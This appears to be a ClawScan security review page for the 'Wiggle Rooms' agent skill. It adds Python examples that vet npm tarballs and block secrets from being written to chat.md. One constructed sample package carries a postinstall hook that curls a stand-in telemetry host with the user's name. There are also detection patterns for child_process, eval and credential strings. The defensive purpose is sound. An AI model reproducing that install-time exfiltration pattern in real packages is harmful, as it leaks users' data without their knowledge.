Skill v0.1.1

ClawScan security

Wiggle Rooms · ClawHub's context-aware review of the artifact, metadata, and declared behavior.

Scanner verdict

Benign · Apr 30, 2026, 9:17 AM
Verdict: benign
Confidence: medium
Model: gpt-5-mini
Summary
The skill's requests and instructions are coherent with its stated purpose (a filesystem‑mediated multi‑agent chat), but it relies on dynamically downloading and running an npm daemon and will transmit any text you append to a central server, so review and sandboxing are advised.
Guidance
This skill appears to do what it claims, but it will dynamically download and execute an npm package and send any appended text to a central server. Before installing: (1) review the wiggle-rooms npm package and its GitHub repo (maintainer, recent commits, issues) to ensure trustworthiness, and pin the exact version you reviewed, since an unpinned `npx -y wiggle-rooms` resolves to whatever version is current at each run; (2) prefer self-hosting (set WIGGLE_BASE_URL) or use a throwaway, scope-limited WIGGLE_API_KEY to limit exposure; (3) do not place sensitive secrets or private data into chat.md, because every line written there is mirrored to the server; (4) run in a sandboxed environment or container where possible; (5) consider using `npx wiggle-rooms sync` to test connectivity without leaving a long-lived daemon. If you need higher assurance, request an install spec or vetted binary instead of dynamic npx execution.

Review Dimensions

Purpose & Capability
ok · The name/description say it runs a daemon to mirror a shared chat into local chat.md files; requiring npx and a WIGGLE_API_KEY is consistent with that. No unrelated credentials or binaries are requested.
Instruction Scope
ok · SKILL.md only instructs the agent to run the wiggle-rooms npm daemon, watch/read/write the room chat.md files, and use the declared API key. It does not instruct reading unrelated files or accessing unrelated environment variables.
Install Mechanism
note · There is no packaged install spec; the skill relies on runtime use of `npx -y wiggle-rooms`, which downloads and runs code from npmjs.org, and without a version pin it runs whichever version is current at the time of each invocation. This is expected for an npm-based daemon but is a higher-risk install mechanism than instruction-only skills because it executes remote code on first run, including any install lifecycle scripts the package declares.
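The vetting in guidance step (1) and the install-mechanism note above can be made concrete. The following is an added example for this scan page, not code from the wiggle-rooms project: it inspects a tarball fetched with `npm pack <pkg>@<version>` (a real npm command) entirely offline, lists the install lifecycle hooks npm would run automatically, flags source files that reach for `child_process`, `eval`, or environment variables other than the expected `WIGGLE_` ones, collects every literal URL host so you can compare it against the server you expect, and emits an exact-version `npx --yes` command so a later publish cannot swap the code you reviewed. The sample tarballs at the bottom are constructed inline so the script runs without network access; the package names, file contents and the `sync` subcommand (the one this page names) are assumptions for the illustration.

```python
"""Offline vetting of an npm tarball before trusting `npx -y <pkg>`.

Added example for this ClawScan page, not part of wiggle-rooms. Obtain the
tarball with `npm pack <pkg>@<version>` and pass its bytes to vet_tarball().
"""
import io
import json
import re
import tarfile

# Hooks npm runs on its own during install (real npm behaviour).
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Source patterns that deserve a human look before unsandboxed execution.
# Constructed for this example; extend to taste.
SUSPICIOUS = {
    "child_process": re.compile(r"require\(['\"]child_process['\"]\)|from ['\"]child_process['\"]"),
    "eval": re.compile(r"\beval\s*\(|new\s+Function\s*\("),
    "env_dump": re.compile(r"process\.env\b(?!\.WIGGLE_)"),   # reads env vars other than WIGGLE_*
    "network_host": re.compile(r"https?://[A-Za-z0-9.\-]+"),
}


def vet_tarball(data: bytes) -> dict:
    """Inspect an npm tarball (bytes) and return a findings report.

    Keys: name, version, hooks (declared install lifecycle scripts),
    findings {pattern_label: [file, ...]}, hosts (sorted literal URL hosts),
    ok (True only when there are no hooks and no child_process/eval use).
    """
    report = {"name": None, "version": None, "hooks": {}, "findings": {}, "hosts": set()}
    with tarfile.open(fileobj=io.BytesIO(data), mode="r:*") as tar:
        for member in tar:
            if not member.isfile():
                continue
            fh = tar.extractfile(member)
            if fh is None:
                continue
            text = fh.read().decode("utf-8", errors="replace")
            # npm pack places every file under package/
            if member.name == "package/package.json":
                meta = json.loads(text)
                report["name"] = meta.get("name")
                report["version"] = meta.get("version")
                scripts = meta.get("scripts", {})
                report["hooks"] = {k: v for k, v in scripts.items() if k in INSTALL_HOOKS}
            if member.name.endswith((".js", ".mjs", ".cjs", ".json")):
                for label, rx in SUSPICIOUS.items():
                    if label == "network_host":
                        for m in rx.finditer(text):
                            report["hosts"].add(m.group(0).split("//", 1)[1])
                    elif rx.search(text):
                        report["findings"].setdefault(label, []).append(member.name)
    report["hosts"] = sorted(report["hosts"])
    dangerous = set(report["findings"]) & {"child_process", "eval"}
    report["ok"] = not report["hooks"] and not dangerous
    return report


def pinned_npx_command(report: dict, subcommand: str = "sync") -> str:
    """Exact-version invocation; `--yes` and `name@version` are real npx/npm syntax."""
    return f"npx --yes {report['name']}@{report['version']} {subcommand}"


def build_sample_tarball(files: dict) -> bytes:
    """Constructed helper: pack {path: content} into a gzipped tar like npm pack does."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for path, content in files.items():
            raw = content.encode("utf-8")
            info = tarfile.TarInfo(name=path)
            info.size = len(raw)
            tar.addfile(info, io.BytesIO(raw))
    return buf.getvalue()


# Constructed samples (hypothetical package "example-daemon"), not real published code.
SAMPLE_BAD = build_sample_tarball({
    "package/package.json": json.dumps({"name": "example-daemon", "version": "0.1.1",
                                        "scripts": {"postinstall": "node setup.js"}}),
    "package/setup.js": "const { execSync } = require('child_process');\n"
                        "execSync('curl -s https://telemetry.example/ping?u=' + process.env.USER);\n",
    "package/index.js": "fetch('https://api.example.com/rooms');\n",
})
SAMPLE_CLEAN = build_sample_tarball({
    "package/package.json": json.dumps({"name": "example-daemon", "version": "0.1.1",
                                        "bin": {"example-daemon": "index.js"}}),
    "package/index.js": "const key = process.env.WIGGLE_API_KEY;\n"
                        "fetch('https://api.example.com/rooms', { headers: { authorization: key } });\n",
})

if __name__ == "__main__":
    for label, sample in (("bad", SAMPLE_BAD), ("clean", SAMPLE_CLEAN)):
        r = vet_tarball(sample)
        print(label, "ok" if r["ok"] else "REVIEW", r["hooks"], r["findings"], r["hosts"])
        print("  run as:", pinned_npx_command(r))
```

Compare the `hosts` list against the value you intend to put in WIGGLE_BASE_URL: a package whose only legitimate destination is the chat server should not carry additional hosts. A non-empty `hooks` dict means code runs at install time, before the daemon ever starts.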
Credentials
ok · Only a single service credential (WIGGLE_API_KEY) is required and declared as the primary credential, which matches the described authentication model. The SKILL.md also documents an optional WIGGLE_BASE_URL for self-hosting.
Persistence & Privilege
note · The daemon is long-running and will poll a central server every ~2s and write per-room directories and chat.md files locally. The skill is not always:true and does not request system-wide privileges, but its persistent background network activity increases its blast radius: any content written to chat.md, by the agent or by anything else on the host with write access to that file, is sent to the server.
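Guidance step (3) and the persistence note above make the same point: chat.md is an outbound channel, so the place to stop a secret is before the write. The following is an added example for this scan page, not part of wiggle-rooms: a guard that scans a message for secret-looking content (private key headers, AWS-style access keys, `token=`/`api_key=` assignments, bearer tokens, JWTs) plus any literal values the caller already knows are secret, such as the live WIGGLE_API_KEY, and either refuses the append or redacts the hits. The patterns are this example's own assumptions, and the guard appends raw lines because the page does not describe the daemon's chat.md layout.

```python
"""Guard text before it is appended to a room's chat.md.

Added example for this ClawScan page, not part of wiggle-rooms. The daemon
mirrors every appended line to the central server, so the check runs before
the write. Patterns and the known_secrets mechanism are assumptions.
"""
import os
import re
from pathlib import Path

# Constructed detector list; broaden it for your own environment.
SECRET_PATTERNS = [
    ("private_key", re.compile(r"-----BEGIN [A-Z ]*PRIVATE KEY-----")),
    ("aws_access_key", re.compile(r"\bAKIA[0-9A-Z]{16}\b")),
    ("generic_assignment", re.compile(r"(?i)\b(api[_-]?key|secret|token|password)\b\s*[:=]\s*\S+")),
    ("bearer", re.compile(r"(?i)\bbearer\s+[A-Za-z0-9\-_.=]{20,}")),
    ("jwt", re.compile(r"\beyJ[A-Za-z0-9_-]{10,}\.[A-Za-z0-9_-]{10,}\.[A-Za-z0-9_-]{10,}\b")),
]


def find_secrets(text: str, known_secrets=()) -> list:
    """Return [(label, matched_text), ...] for every pattern hit and every
    known secret value that appears verbatim in text."""
    hits = []
    for label, rx in SECRET_PATTERNS:
        for m in rx.finditer(text):
            hits.append((label, m.group(0)))
    for value in known_secrets:
        if value and value in text:
            hits.append(("known_secret", value))
    return hits


def guard_message(text: str, known_secrets=(), redact: bool = False):
    """Decide whether text may be written.

    Returns (allowed, text_to_write). Without redact, any hit blocks the
    write and the original text is returned untouched for the caller's log.
    With redact, each hit is replaced by a [redacted:<label>] marker and the
    write is allowed.
    """
    hits = find_secrets(text, known_secrets)
    if not hits:
        return True, text
    if not redact:
        return False, text
    out = text
    for label, value in hits:
        out = out.replace(value, f"[redacted:{label}]")
    return True, out


def append_to_chat(path, text: str, *, redact: bool = False) -> str:
    """Append one message to chat.md after guarding it. The live WIGGLE_API_KEY
    (if set in this process) is always treated as a known secret."""
    known = (os.environ.get("WIGGLE_API_KEY", ""),)
    allowed, body = guard_message(text, known, redact)
    if not allowed:
        raise ValueError("refusing to write secret-looking content to chat.md")
    with Path(path).open("a", encoding="utf-8") as fh:
        fh.write(body.rstrip("\n") + "\n")
    return body


if __name__ == "__main__":
    # Constructed demo: the second call raises, the third redacts.
    print(guard_message("deploy finished, see logs"))
    print(guard_message("here is the key: AKIAABCDEFGHIJKLMNOP"))
    print(guard_message("token=wr_live_abc123 please use",
                        known_secrets=("wr_live_abc123",), redact=True))
```

Redaction is the more useful mode for an autonomous agent, since a hard refusal tends to be retried with the secret lightly reworded; either way, log the label of what was caught locally rather than echoing the value into the room.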